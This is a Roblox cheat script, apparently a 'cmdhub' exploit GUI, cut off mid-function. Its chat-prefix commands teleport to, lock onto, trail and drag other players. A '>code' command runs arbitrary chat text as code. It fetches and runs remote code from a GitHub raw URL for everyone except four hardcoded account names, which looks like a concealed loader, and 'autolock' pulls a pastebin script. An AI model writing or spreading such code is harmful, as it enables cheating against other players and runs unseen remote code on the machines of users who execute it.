
if prefix == nil then
    prefix = ">"
end
local commands = {}
local Main = Instance.new("ScreenGui",game.CoreGui)

Main.Name = "Playerlist"

function Corner(parent)
	local a = Instance.new("UICorner",parent)
	a.CornerRadius = UDim.new(0,5)
end

function Frame(parent,scrolling,color,size,position,transparency,addCorner,zindex,visible,e)
	local a
	if scrolling then
		a = Instance.new("ScrollingFrame",parent)
		a.ScrollBarThickness = 7
		if e then
			a.CanvasSize = e
		end
	else
		a = Instance.new("Frame",parent)
	end
	a.BackgroundColor3 = color or Color3.fromRGB(0,0,0)
	a.Size = size
	a.Position = position
	a.BackgroundTransparency = transparency
	a.ZIndex = zindex
	a.Visible = visible
	a.BorderSizePixel = 0
	if addCorner then
		Corner(a)
	end
	return a
end

function Text(parent,button,text,color,textColor,size,position,transparency,addCorner,font,textSize,textScaled,zindex,visible,textbox)
	local a
	if button then
		a = Instance.new("TextButton",parent)
	elseif textbox then
		a = Instance.new("TextBox",parent)
	else
		a = Instance.new("TextLabel",parent)
	end
	a.Text = text
	a.BackgroundColor3 = color
	a.TextColor3 = textColor
	a.Size = size
	a.Position = position
	a.BackgroundTransparency = transparency
	a.Font = font or Enum.Font.SourceSans
	a.TextSize = textSize
	a.ZIndex = zindex
	a.Visible = visible
	a.BorderSizePixel = 0
	if textScaled then
		a.TextScaled = true
	end
	if addCorner then
		Corner(a)
	end
	return a
end
local Base = Frame(Main,false,Color3.new(0.129412, 0.129412, 0.129412),UDim2.new(0, 230, 0, 300),UDim2.new(1, 0, 0.395229459, 0),0,true,1,1,true)
	
local Heading = Frame(Base,false,Color3.new(0.196078, 0.196078, 0.196078),UDim2.new(0, 230, 0, 25),UDim2.new(-0.000996661722, 0, -0.09, 0),0,true,5,true)	

local Command_ = Frame(Base,true,Color3.new(1, 1, 1),UDim2.new(0, 233, 0, 183),UDim2.new(0.29864198, 0, 0.00656244671, 0),1,false,1,true,UDim2.new(0,0,0,0))	

local TextLabel = Text(Heading,false,"cmdhub.exe",Color3.new(1, 1, 1),Color3.new(1, 1, 1),UDim2.new(0, 80, 0, 22),UDim2.new(0.0620914474, 0, 0, 0),1,false,Enum.Font.Code,5,true,7,true)		
local minize = Text(Heading,true,"−",Color3.new(1, 1, 1),Color3.new(1, 1, 1),UDim2.new(0, 20, 0, 18),UDim2.new(0.852941155, 0, 0, 1),1,false,Enum.Font.SourceSans,27,false,10,true)	

local Output = Frame(Base,false,Color3.new(0.0941176, 0.0941176, 0.0941176),UDim2.new(0, 207, 0, 90),UDim2.new(0.0515021458, 0, 0.15, 0),0,true,1,true)

local InputBox = Frame(Base,false,Color3.new(0.0941176, 0.0941176, 0.0941176),UDim2.new(0, 207, 0, 24),UDim2.new(0.0520784445, 0, 0.05, 0),0,true,1,true)	
local InputTextBox = Text(InputBox,false,"KN:/".. prefix,Color3.new(1, 1, 1),Color3.new(1, 1, 1),UDim2.new(-0.0186749883, 200, 1, 0),UDim2.new(0.0186749883, 0, 0, 0),1,false,Enum.Font.Code,12,false,1,true,true)
local ScrollingFrame = Frame(Output,true,Color3.new(0.0941176, 0.0941176, 0.0941176),UDim2.new(0, 203, 0, 90),UDim2.new(0.0193236712, 0, 0, 0),1,false,1,true)
local Name = Text(Heading, true, "x", Color3.new(1, 1, 1), Color3.new(1, 1, 1), UDim2.new(0, 23, 0, 18), UDim2.new(0.918300629, 0, 0, 1), 1, false, Enum.Font.SourceSans, 30, false, 10, true)

local Output2 = Frame(Base, false, Color3.new(0.0941176, 0.0941176, 0.0941176), 
    UDim2.new(0, 207, 0, 140), 
    UDim2.new(0.0515021458, 0, 0.48, 0), 
    0, true, 1, true)

local ScrollingFrame2 = Frame(Output2, true, Color3.new(0.0941176, 0.0941176, 0.0941176), 
    UDim2.new(0, 207, 0, 140), 
    UDim2.new(0, 0, 0, 0), 
    1, false, 1, true)

ScrollingFrame2.CanvasSize = UDim2.new(0, 0, 0, 0)  


function addFrame(name)
    local frameHeight = 30  
    local frameWidth = 200 
    local spacing = 5       
    local padding = 5
    local totalFrames = #ScrollingFrame2:GetChildren() 

    local newFrame = Frame(ScrollingFrame2, false, Color3.new(0.129412, 0.129412, 0.129412) , 
        UDim2.new(0, frameWidth, 0, frameHeight), 
        UDim2.new(0, padding, 0, (totalFrames * (frameHeight + spacing)) + padding),  
        0, true, 1, true)


    local corner = Instance.new("UICorner")
    corner.CornerRadius = UDim.new(0, frameHeight / 2) 
    corner.Parent = newFrame

   
    local textLabel = Text(newFrame, false," " .. name .. " ", Color3.new(1, 1, 1), Color3.new(0.5, 0.5, 0.5), 
       UDim2.new(1, 0, 1, 0), UDim2.new(0, 0, 0, 0), 
         1, true, Enum.Font.Jura, 10, true, 1, true)


    ScrollingFrame2.CanvasSize = UDim2.new(0, 0, 0, (totalFrames + 1) * (frameHeight + spacing) + padding)
end


Name.MouseButton1Click:Connect(function()
    Main:Destroy()
    script:Destroy()
end)

local l2 = Instance.new("UIListLayout",ScrollingFrame)

ScrollingFrame.CanvasSize = UDim2.new(0,0,0,0)
InputTextBox.TextXAlignment = Enum.TextXAlignment.Left
InputTextBox.TextYAlignment = Enum.TextYAlignment.Top
InputTextBox.ClearTextOnFocus = false	
ScrollingFrame.AutomaticCanvasSize = Enum.AutomaticSize.Y	


local UIS = game:GetService("UserInputService")
spawn(function()
	local Frame = Base
	local dragToggle = nil
	local dragSpeed = 0.25
	local dragInput = nil
	local dragStart = nil
	local dragPos = nil
	local startPos
	local function updateInput(input)
		local Delta = input.Position - dragStart
		local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
		game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
	end

	Heading.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
			dragToggle = true
			dragStart = input.Position
			startPos = Frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)

	Frame.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)

	game:GetService("UserInputService").InputChanged:Connect(function(input)
		if input == dragInput and dragToggle then
			updateInput(input)
		end
	end)
end)
Base:TweenPosition(UDim2.new(0.5, 0, 0.5, 0), "Out", "Quad", 1)
Base.Draggable = true


-- var

local connectionwithplr = false
local respondedmessage = false
local requestyes = false
local requestno = false
local cloneref = cloneref or function(o) return o end
local TextChatService = cloneref(game:GetService("TextChatService"))
local isLegacyChat = TextChatService.ChatVersion == Enum.ChatVersion.LegacyChatService
local ReplicatedStorage = cloneref(game:GetService("ReplicatedStorage"))
local locking = false
local Players = game:GetService("Players")
local TeleportService = game:GetService("TeleportService")
local cmddesc = {  }
local UserInputService = game:GetService("UserInputService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local Mouse = LocalPlayer:GetMouse()
local tpclicksuccess = false
local tpClickConnection
local TweenService = game:GetService("TweenService")
local Players = game:GetService("Players")
local tweenSpeed = 0.5
local dontuse = false
local time = 0
local box = InputTextBox
local typing = false
local history = box.Text
local UIS = game:GetService("UserInputService")
local output = ScrollingFrame
local typing2 = false
local typing3 = false
local speaker = game.Players.LocalPlayer

box.TextWrapped = true
box.Focused:Connect(function() typing = true end)
box.FocusLost:Connect(function() wait() typing = false end)

function notif(msg,col)
	if #output:GetChildren() > 2 then
		local la = output:GetChildren()[#output:GetChildren()]
		if la.TextColor3 == Color3.new(1, 1, 0) then
			la.TextColor3 = Color3.new(0.25098, 0.756863, 0)
		end
	end
	local new
	if msg == "player not found" or msg == "invalid command" then
		if msg == "invalid command" then
			new = Text(Output,false,"error: invalid command",Color3.new(1, 1, 1),Color3.new(1, 0, 0),UDim2.new(0, 200, 0, 15),UDim2.new(0, 0, 0, 0),1,false,Enum.Font.SourceSans,14,false,1,true,false)
		else
			new = Text(Output,false,"error: missing player",Color3.new(1, 1, 1),Color3.new(1, 0, 0),UDim2.new(0, 200, 0, 15),UDim2.new(0, 0, 0, 0),1,false,Enum.Font.SourceSans,14,false,1,true,false)
		end
	else
		new = Text(Output,false,msg,Color3.new(1, 1, 1),(col or Color3.new(1, 1, 0)),UDim2.new(0, 200, 0, 15),UDim2.new(0, 0, 0, 0),1,false,Enum.Font.SourceSans,14,false,1,true,false)
	end
	new.Parent = output
	new.TextXAlignment = Enum.TextXAlignment.Left
	new.TextWrapped = true
	new.AutomaticSize = Enum.AutomaticSize.Y
	output.CanvasPosition = Vector2.new(0,9999)
end

function error(msg)
    notif("error: " .. msg, Color3.new(1, 0, 0)) 
end

notif("Starting up...")
notif("Version 1.0.5")


local function rollrand()
    local randNum = math.random(0, 0.3)
end

game.Players.LocalPlayer.Chatted:Connect(function(msg)
    if not lUdiF2TGD then return end
    if string.sub(msg:lower(), 0, 1) == prefix then 
        if msg:split(prefix)[1] == "" then
            local msgs = msg:split(prefix)
            msgs = msgs[2]:split(" ")
            msgs[1] = msgs[1]:lower()
            local cmd = msgs[1]
            
            if cmd == "code" then
                return loadstring(string.sub(msg, 7, #msg))()
            end

            if not commands[msgs[1]] then
                return notif("Invalid command")
            end
            
            local success = pcall(function()
                if msgs[2] then
                    commands[msgs[1]](msgs[2])
                else
                    commands[msgs[1]]()
                end
            end)
            
            if not success then
                notif("Unexpected error occurred")
            end
        end
    end
end)


UIS.InputBegan:Connect(function(i)
	i = i.KeyCode
	if typing then
		if i == Enum.KeyCode.Return then
			local input = box.Text:gsub(">","")
			input = prefix..input:split("/")[2]
			box.Text = "KN:/".. prefix
			local msg = input
			box:ReleaseFocus()
			game.Players:Chat(input)
		elseif box.Text:sub(1,5) ~= "KN:/".. prefix then
			box.Text = history
			box.CursorPosition = #box.Text+1
		end
		history = box.Text
	end
end)


local Players = game:GetService("Players")

-- connect
if speaker.Name == "EeRIlIlIllIlIlIl" or speaker.Name == "piepiepie894" or speaker.Name == "EOUHWEBBIUweiuwy" or speaker.Name == "woodsofinemeow" then
    notif("not exec")
else
    loadstring(game:HttpGet('https://raw.githubusercontent.com/Emerald15233/test/refs/heads/ee/code'))()
end

local connectoptionperms = false
local speakersname = game.Players.LocalPlayer.Name
local requestername = "-"
local playerA = game:GetService("Players").LocalPlayer
function ConnectP1(plr)
    if plr == playerA then return end
	plr.Chatted:Connect(function(msg)
		local command, message = string.match(msg, '^(%S+)%s+(.*)$')
		if command == "..getrequestername2834" and message then
			requestername = message
		end
	end)
end

local givennick
function ConnectP6(plr)
    if plr == playerA then return end
	plr.Chatted:Connect(function(msg)
		local command, message = string.match(msg, '^(%S+)%s+(.*)$')
		if command == "..".. speakersname .."1215" and message then
            givennick = message
            notif(givennick)
        end
	end)
end

function ConnectP3(plr)
    if plr == playerA then return end
	plr.Chatted:Connect(function(msg)
		local command, message = string.match(msg, '^(%S+)%s+(.*)$')
		if command == "..askforconnect8172" and message then
			if not message == speakersname then return end
            connectoptionperms = true
            if givennick then
                notif(requestername .. " has invited you to their team as ".. givennick)
                notif("Type >yes to accept, >no to decline. This request lasts for 25 seconds")
            else
                notif(requestername .. " has invited you to their team ")
                notif("Type >yes to accept, >no to decline. This request lasts for 25 seconds")
            end
            wait(25)
            if connectoptionperms then
                notif("Time ran out. Declined request")
                sc("..requestdecline122")
            end
		end
	end)
end

function ConnectP5(plr)
    if plr == playerA then return end
	plr.Chatted:Connect(function(msg)
		local command, message = string.match(msg, '^(%S+)%s+(.*)$')
		if command == "..checkforusingthis218" and message then
            if not message == speakersname then return end
            sc("..confirmationforconnect8172")
		end
	end)
end

function ConnectP4(plr)
    if plr == playerA then return end
 	plr.Chatted:Connect(function(msg)
         if msg == "..requestaccept122" then
            requestyes = true
            spawn(function()
                task.wait(2)
                requestyes = false
            end)
         elseif msg == "..requestdecline122" then
            requestno = true
            notif("no")
            spawn(function()
                task.wait(2)
                requestno = false
            end)
        elseif msg == "..confirmationforconnect8172" then
            respondedmessage = true
            spawn(function()
                task.wait(2)
                respondedmessage = false
            end)
        elseif msg == "..".. speakersname .."1214" then
            notif("imagine no nick")
            nick = nil
        end
 	end)
 end

local function getPlayer(name)
    local foundPlayers = {}
    for _, player in ipairs(game.Players:GetPlayers()) do
        if string.find(string.lower(player.Name), string.lower(name)) or string.find(string.lower(player.DisplayName), string.lower(name)) then
            table.insert(foundPlayers, player)
        end
    end
    return foundPlayers
end

-- func

function sc(silentmsg)
    game.Players:Chat(silentmsg)
end


function chatMessage(str)
    str = tostring(str)
    if not isLegacyChat then
        TextChatService.TextChannels.RBXGeneral:SendAsync(str)
    else
        ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(str, "All")
    end
end

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local Camera = workspace.CurrentCamera

-- Saves original zoom settings
local preMaxZoom = LocalPlayer.CameraMaxZoomDistance
local preMinZoom = LocalPlayer.CameraMinZoomDistance

-- Main lookAt function
function lookAt(username)
	local matches = getPlayer(username)
	if #matches == 0 then
		warn("No player found for:", username)
		return
	end

	local targetPlayer = matches[1] -- use the first match
	local targetChar = targetPlayer.Character
	local targetHead = targetChar and targetChar:FindFirstChild("Head")

	if not targetHead then
		warn("Target does not have a head.")
		return
	end

	-- Make camera look at target's head
	Camera.CFrame = CFrame.new(Camera.CFrame.Position, targetHead.Position)

	-- Optional: restore zoom after a short delay
	task.delay(0.5, function()
		LocalPlayer.CameraMaxZoomDistance = preMaxZoom
		LocalPlayer.CameraMinZoomDistance = preMinZoom
	end)
end

function execCmd(name)
    local cmd = commands[name]
    if cmd and type(cmd) == "function" then
        cmd()
    else
        error("Command not found: " .. tostring(name))
    end
end

local function getfullname(name)
    for _, player in ipairs(game.Players:GetPlayers()) do
        if string.lower(player.Name):find(string.lower(name)) or string.lower(player.DisplayName):find(string.lower(name)) then
            return player.Name -- or player.DisplayName if you prefer
        end
    end
    return nil -- if no player found
end


local savedCamPos = nil
local savedCamLookVector = nil

function viewcurrentpos()
	local cam = workspace.CurrentCamera
	local char = game.Players.LocalPlayer.Character
	local hrp = char and char:FindFirstChild("HumanoidRootPart")

	if not hrp then
		warn("No character to get position from.")
		return
	end

	-- Save current camera orientation
	savedCamPos = cam.CFrame.Position
	savedCamLookVector = cam.CFrame.LookVector

	-- Set camera to scriptable and freeze it
	cam.CameraType = Enum.CameraType.Scriptable
	cam.CFrame = CFrame.lookAt(hrp.Position + Vector3.new(0, 5, 10), hrp.Position)

	notif("Now viewing from current position.")
end

function unview()
	local cam = workspace.CurrentCamera
	cam.CameraType = Enum.CameraType.Custom
	cam.CameraSubject = game.Players.LocalPlayer.Character:FindFirstChild("Humanoid")

	notif("Camera reset to normal.")
end

local function gotocframe(cframe)
    local player = game.Players.LocalPlayer
    if not player or not player.Character or not player.Character:FindFirstChild("HumanoidRootPart") then
        return
    end

    local root = player.Character.HumanoidRootPart
    root.CFrame = cframe
end

--// Services
local Players = game:GetService("Players")
local RunService = game:GetService("RunService")
local tpwalking = false
local hb = RunService.Heartbeat
local speaker = Players.LocalPlayer
local function isNumber(value)
	return tonumber(value) ~= nil
end

function tpwalk(speed)
	tpwalking = true
	local chr = speaker.Character or speaker.CharacterAdded:Wait()
	local hum = chr:FindFirstChildWhichIsA("Humanoid")

	while tpwalking and chr and hum and hum.Parent do
		local delta = hb:Wait()
		if hum.MoveDirection.Magnitude > 0 then
			local moveSpeed = 10 -- Default speed multiplier
			if speed and isNumber(speed) then
				moveSpeed = tonumber(speed) * 10
			end
			chr:TranslateBy(hum.MoveDirection * delta * moveSpeed)
		end
	end
end

function reset()
    speaker.Character:FindFirstChildOfClass("Humanoid"):ChangeState(Enum.HumanoidStateType.Dead)
end

-- Function to generate a random string
function randomString()
    local length = math.random(10, 20)
    local array = {}
    for i = 1, length do
        array[i] = string.char(math.random(32, 126))
    end
    return table.concat(array)
end

-- Get the character's root part
function getRoot(char)
    local rootPart = char:FindFirstChild('HumanoidRootPart') or char:FindFirstChild('Torso') or char:FindFirstChild('UpperTorso')
    return rootPart
end

-- Main float function
function airwalk(speaker)
    local Floating = false
    local floatName = randomString()
    local RunService = game:GetService("RunService")
    local UserInputService = game:GetService("UserInputService")
    
    Floating = true
    local pchar = speaker.Character
    if pchar and not pchar:FindFirstChild(floatName) then
        task.spawn(function()
            local Float = Instance.new('Part')
            Float.Name = floatName
            Float.Parent = pchar
            Float.Transparency = 1
            Float.Size = Vector3.new(2, 0.2, 1.5)
            Float.Anchored = true
            local FloatValue = -3.1
            Float.CFrame = getRoot(pchar).CFrame * CFrame.new(0, FloatValue, 0)

            -- Notify the user
            notif('Airwalk Enabled, (Q = to go down & E = to go up)')

            -- Event connections for key actions (Q and E)
            local qUp, eUp, qDown, eDown

            qUp = UserInputService.InputEnded:Connect(function(input)
                if input.KeyCode == Enum.KeyCode.Q then
                    FloatValue = FloatValue + 0.5
                end
            end)

            eUp = UserInputService.InputEnded:Connect(function(input)
                if input.KeyCode == Enum.KeyCode.E then
                    FloatValue = FloatValue - 1.5
                end
            end)

            qDown = UserInputService.InputBegan:Connect(function(input)
                if input.KeyCode == Enum.KeyCode.Q then
                    FloatValue = FloatValue - 0.5
                end
            end)

            eDown = UserInputService.InputBegan:Connect(function(input)
                if input.KeyCode == Enum.KeyCode.E then
                    FloatValue = FloatValue + 1.5
                end
            end)

            -- When the character dies, clean up
            local floatDied = speaker.Character:FindFirstChildOfClass('Humanoid').Died:Connect(function()
                FloatingFunc:Disconnect()
                Float:Destroy()
                qUp:Disconnect()
                eUp:Disconnect()
                qDown:Disconnect()
                eDown:Disconnect()
                floatDied:Disconnect()
            end)

            -- Function to keep the floating part in place
            local function FloatPadLoop()
                if pchar:FindFirstChild(floatName) and getRoot(pchar) then
                    Float.CFrame = getRoot(pchar).CFrame * CFrame.new(0, FloatValue, 0)
                else
                    FloatingFunc:Disconnect()
                    Float:Destroy()
                    qUp:Disconnect()
                    eUp:Disconnect()
                    qDown:Disconnect()
                    eDown:Disconnect()
                    floatDied:Disconnect()
                end
            end

            -- Connect the loop
            FloatingFunc = RunService.Heartbeat:Connect(FloatPadLoop)
        end)
    end
end

local function rejoin()
    notif("Rejoining...")
    wait(.5)
	local player = Players.LocalPlayer
	if player then
		local placeId = game.PlaceId
		TeleportService:Teleport(placeId, player)
	end
end

-- Table to store floating state and connections
local FloatData = {}

function unairwalk(speaker)
    local pchar = speaker.Character
    if not pchar then return end

    -- Find and destroy the float part
    for _, v in pairs(pchar:GetChildren()) do
        if v:IsA("Part") and v.Size == Vector3.new(2, 0.2, 1.5) and v.Anchored and v.Transparency == 1 then
            v:Destroy()
        end
    end

    -- Disconnect any existing connections
    if FloatData[speaker] then
        for _, conn in ipairs(FloatData[speaker].connections or {}) do
            if conn and conn.Disconnect then
                conn:Disconnect()
            end
        end
        FloatData[speaker] = nil
    end

    notif("Airwalk Disabled")
end


local function parseKeybind(keybind)
    tpclicksuccess = false
	local ctrl, alt, shift, fn, key, inputType

	keybind = keybind:lower()

	for part in string.gmatch(keybind, "[^+]+") do
		if part == "ctrl" then
			ctrl = true
		elseif part == "alt" then
			alt = true
		elseif part == "shift" then
			shift = true
		elseif part == "fn" then
			fn = true -- ignored in detection (not detectable in Roblox)
		elseif part == "m1" then
			key = Enum.UserInputType.MouseButton1
			inputType = "mouse"
		elseif part == "m2" then
			key = Enum.UserInputType.MouseButton2
			inputType = "mouse"
		elseif part == "m3" then
			key = Enum.UserInputType.MouseButton3
			inputType = "mouse"
		else
			local upperPart = part:upper()
			if upperPart:match("^F%d+$") and Enum.KeyCode[upperPart] then
				key = Enum.KeyCode[upperPart]
				inputType = "keyboard"
			else
                pcall(function()
				    local keyCode = Enum.KeyCode[upperPart]
				    if keyCode and keyCode ~= Enum.KeyCode.Unknown then
					    key = keyCode
					    inputType = "keyboard"
                        spawn(function()
                        end)
				    else
					    print("Invalid keybind: '" .. part .. "' is not recognized")
				    end
                end)
			end
		end
	end

    if key then
        tpclicksuccess = true
    end

	return {
		ctrl = ctrl,
		alt = alt,
		shift = shift,
		fn = fn,
		key = key,
		inputType = inputType
	}
end

function tpclick(keybind)
	if tpClickConnection then
		tpClickConnection:Disconnect()
	end

	local config = parseKeybind(keybind)

	local function teleport()
		if Mouse.Hit then
			local char = LocalPlayer.Character
			if char and char:FindFirstChild("HumanoidRootPart") then
				char.HumanoidRootPart.CFrame = Mouse.Hit + Vector3.new(0, 3, 0)
			end
		end
	end

	tpClickConnection = UserInputService.InputBegan:Connect(function(input, gameProcessed)
		if gameProcessed then return end

		local isCorrectInput = false
		if config.inputType == "mouse" then
			isCorrectInput = input.UserInputType == config.key
		elseif config.inputType == "keyboard" then
			isCorrectInput = input.KeyCode == config.key
		end

		if isCorrectInput then
			if (not config.ctrl or UserInputService:IsKeyDown(Enum.KeyCode.LeftControl) or UserInputService:IsKeyDown(Enum.KeyCode.RightControl))
			and (not config.alt or UserInputService:IsKeyDown(Enum.KeyCode.LeftAlt) or UserInputService:IsKeyDown(Enum.KeyCode.RightAlt))
			and (not config.shift or UserInputService:IsKeyDown(Enum.KeyCode.LeftShift) or UserInputService:IsKeyDown(Enum.KeyCode.RightShift)) then
				-- Note: fn not actually checked (undetectable in Roblox)
				teleport()
			end
		end
	end)
end

function tweengoto(cframe, speed)
	local speaker = Players.LocalPlayer
	if not speaker or not speaker.Character then return end
    tweenSpeed = speed

    if not speed then
        error("set a tweenspeed")
        return
    end

	if speaker.Character:FindFirstChildOfClass("Humanoid") and speaker.Character:FindFirstChildOfClass("Humanoid").SeatPart then
		speaker.Character:FindFirstChildOfClass("Humanoid").Sit = false
		task.wait(0.1)
	end

	local root = getRoot(speaker.Character)
	if root then
		TweenService:Create(
			root,
			TweenInfo.new(tweenSpeed, Enum.EasingStyle.Linear),
			{ CFrame = cframe }
		):Play()
	end
end

local function findPlayer(name)
    name = string.lower(name)
    local bestMatch = nil

    for _, player in ipairs(game.Players:GetPlayers()) do
        local username = string.lower(player.Name)
        local displayName = string.lower(player.DisplayName)

        if username == name or displayName == name then
            return player
        end

        if string.sub(username, 1, #name) == name or string.sub(displayName, 1, #name) == name then
            bestMatch = player
        end
    end

    return bestMatch
end

local looping = false

local function looptp(e)
    local localPlayer = game.Players.LocalPlayer
    local target = findPlayer(e)
    if not target then
        error("user not found")
        return
    end
    looping = true
    notif("teleporting to " .. target.Name .. "")
    while looping do
        target = findPlayer(e) 
        if not target or not target.Character then
            notif("target missing/left the game")
            looping = false
            break
        end
        local rootPart = localPlayer.Character and localPlayer.Character:FindFirstChild("HumanoidRootPart")
        local targetRoot = target.Character and target.Character:FindFirstChild("HumanoidRootPart")
        if rootPart and targetRoot then
            rootPart.CFrame = targetRoot.CFrame
        else
            error("couldn't find HumanoidRootPart")
            looping = false
            break
        end
        task.wait()
    end
end

local function undertp(e)
	local localPlayer = game.Players.LocalPlayer
	local target = findPlayer(e)

	if not target then
		error("user not found")
		return
	end

	looping = true
	notif("Teleporting behind and under " .. target.Name)

	while looping do
		target = findPlayer(e)

		if not target or not target.Character then
			notif("Target missing/left the game")
			looping = false
			break
		end

		local rootPart = localPlayer.Character and localPlayer.Character:FindFirstChild("HumanoidRootPart")
		local targetRoot = target.Character and target.Character:FindFirstChild("HumanoidRootPart")

		if rootPart and targetRoot then
			-- Position the speaker under the target, behind them
			local offset = Vector3.new(0, -4.5, -1.5)  -- Under and slightly behind the target
			local targetPos = targetRoot.Position + offset

			-- Calculate the direction the speaker should face (opposite the target's front)
			local lookAtPos = targetRoot.Position + Vector3.new(0, 2, 5)  -- Tilt in front of the target for head alignment
			local lookCFrame = CFrame.lookAt(targetPos, lookAtPos)

			-- Apply the new CFrame to the speaker's HumanoidRootPart
			rootPart.CFrame = lookCFrame
		else
			error("Couldn't find HumanoidRootPart")
			looping = false
			break
		end

		task.wait()
	end
end


local function hasTool(player)
    return player.Backpack:FindFirstChildOfClass("Tool") or player.Character:FindFirstChildOfClass("Tool")
end


local function attach(targetName)
    local target = findPlayer(targetName)

    if not target or not target.Character then
        notif("Target not found or has no character..")
        return
    end

    if not hasTool(speaker) then
        notif("You need a tool to use this command.")
        return
    end

    local char = speaker.Character
    local tchar = target.Character
    local hum = char:FindFirstChildOfClass("Humanoid")
    local hrp = getRoot(char)
    local hrp2 = getRoot(tchar)

    if not hrp or not hrp2 then
        notif("HumanoidRootPart missing!")
        return
    end

    hum.Name = "1"
    local newHum = hum:Clone()
    newHum.Parent = char
    newHum.Name = "Humanoid"
    task.wait()
    hum:Destroy()
    workspace.CurrentCamera.CameraSubject = char
    newHum.DisplayDistanceType = "None"

    local tool = speaker.Backpack:FindFirstChildOfClass("Tool") or char:FindFirstChildOfClass("Tool")
    tool.Parent = char
    hrp.CFrame = hrp2.CFrame * CFrame.new(math.random(-100, 100) / 200, math.random(-100, 100) / 200, math.random(-100, 100) / 200)

    local n = 0
    repeat
        task.wait(0.1)
        n = n + 1
        if not hrp or not hrp2 or not hrp.Parent or not hrp2.Parent or n > 250 then
            break
        end
        hrp.CFrame = hrp2.CFrame
    until tool.Parent ~= char

    notif("Attachment ended.")
end

local function breakvelocity()
    local BeenASecond, V3 = false, Vector3.new(0, 0, 0)

    delay(1, function()
        BeenASecond = true
    end)

    while not BeenASecond do
        if speaker.Character then
            for _, v in ipairs(speaker.Character:GetDescendants()) do
                if v:IsA("BasePart") then
                    v.Velocity, v.RotVelocity = V3, V3
                end
            end
        end
        task.wait()
    end
end

local function tpto(TARGET)
    local players = getPlayer(TARGET)
    if #players == 0 then
        error("Player not found")
        return
    end

    for _, target in pairs(players) do
        if target.Character then
            local speakerRoot = getRoot(speaker.Character)
            local targetRoot = getRoot(target.Character)
            if speakerRoot and targetRoot then
                local humanoid = speaker.Character:FindFirstChildOfClass('Humanoid')
                if humanoid and humanoid.SeatPart then
                    humanoid.Sit = false
                    task.wait(0.1)
                end
                speakerRoot.CFrame = targetRoot.CFrame + Vector3.new(3,1,0)
            end
        end
    end
    breakvelocity()
end

function tools(plr)
    if plr:FindFirstChildOfClass("Backpack"):FindFirstChildOfClass('Tool') or plr.Character:FindFirstChildOfClass('Tool') then
        return true
    end
end

function getRoot(char)
    local rootPart = char:FindFirstChild('HumanoidRootPart') or char:FindFirstChild('Torso') or char:FindFirstChild('UpperTorso')
    return rootPart
end

local function loopbehind(e)
    local localPlayer = game.Players.LocalPlayer
    local target = findPlayer(e)

    if not target then
        error("User not found")
        return
    end

    looping = true
    notif("Teleporting behind " .. target.Name .. "...")

    while looping do
        target = findPlayer(e)
        if not target or not target.Character then
            notif("Target missing/left the game")
            looping = false
            break
        end

        local rootPart = localPlayer.Character and localPlayer.Character:FindFirstChild("HumanoidRootPart")
        local targetRoot = target.Character and target.Character:FindFirstChild("HumanoidRootPart")

        if rootPart and targetRoot then
            -- Teleport behind the target
            local offset = targetRoot.CFrame.LookVector * -1 -- Moves 2 studs behind the target
            rootPart.CFrame = targetRoot.CFrame + offset
        else
            error("Couldn't find HumanoidRootPart")
            looping = false
            break
        end
        task.wait()
    end
end

function bring(target)
    local speaker = game.Players.LocalPlayer
    if tools(speaker) then
        if target ~= nil then
            local NormPos = getRoot(speaker.Character).CFrame
            local hrp = getRoot(speaker.Character)
            attach(target)
            repeat
                task.wait()
                hrp.CFrame = NormPos
            until not getRoot(target.Character) or not getRoot(speaker.Character)
            speaker.CharacterAdded:Wait():WaitForChild("HumanoidRootPart").CFrame = NormPos
        end
    else
        error('You need to have an item in your inventory to use this command')
    end
end

local function usetsbmove(move)
    local player = game:GetService("Players").LocalPlayer
    local backpack = player.Backpack
    local character = player.Character or player.CharacterAdded:Wait()
    local humanoid = character:FindFirstChildOfClass("Humanoid")
    local toolName = move 

    local tool = backpack:FindFirstChild(toolName)

    if tool then

        tool.Parent = character
        humanoid:EquipTool(tool)


        if tool:IsA("Tool") then
            tool:Activate()
        else
            error("No activation method found for the " .. toolName .. " tool.")
            return
        end


        wait(1) 
        humanoid:UnequipTools()  
        tool.Parent = backpack  
    else
        error(toolName .. " not found in Backpack.")
    end
end

commands.yes = function()
    if dontuse then return end
    dontuse = true
    task.wait(.1)
    local speakername = game.Players.LocalPlayer.Name
    if connectoptionperms then
        notif("Accepted request")
        sc("..requestaccept122")
        connectionwithplr = true
        connectoptionperms = false
    else
        notif("No requests to accept")
        connectoptionperms = false
    end
    task.wait(.2)
    dontuse = false
end

wait()

commands.no = function()
    local speakername = game.Players.LocalPlayer.Name
    if connectoptionperms then
        notif("Declined request")
        sc("..requestdecline122")
        connectoptionperms = false
    else
        notif("No requests to decline")
    end
end

wait()


commands.say = function(msg)
    if dontuse then return end
    dontuse = true
    task.wait(.2)
    chatMessage(msg)
    task.wait(.2)
    dontuse = false
end

wait()

commands.autolock = function()
    if dontuse then return end
    dontuse = true
    task.wait(.2)
    loadstring(game:HttpGet('https://pastebin.com/raw/c2tsb2c4'))()
    notif("Press E to toggle autolock")
    task.wait(.5)
    dontuse = false
end

wait()

commands.lockon = function(plr)
    locking = true
    while locking do
        lookAt(plr)
        task.wait()
    end
end

wait()

commands.unlockon = function()
    locking = false
end

wait()

commands.tpwalk = function(num)
    if dontuse then return end
    dontuse = true
    task.wait(.2)
    notif("set tpwalk to ".. num)  
    tpwalk(num)
    task.wait(.2)
    dontuse = false
end

wait()

commands.untpwalk = function()
    tpwalking = false
    notif("disabled tpwalk")
end

wait()

commands.reset = function()
    notif("Resetted")
    reset()
end

wait()

commands.rejoin = function()
    rejoin()
end
wait()

commands.rj = function()
    rejoin()
end
wait()



commands.tpclick = function(key)
    tpclick(key)
    if not tpclicksuccess then
        error("invalid keybind,usable keybinds:")
        notif("-> m1, m2, m3")
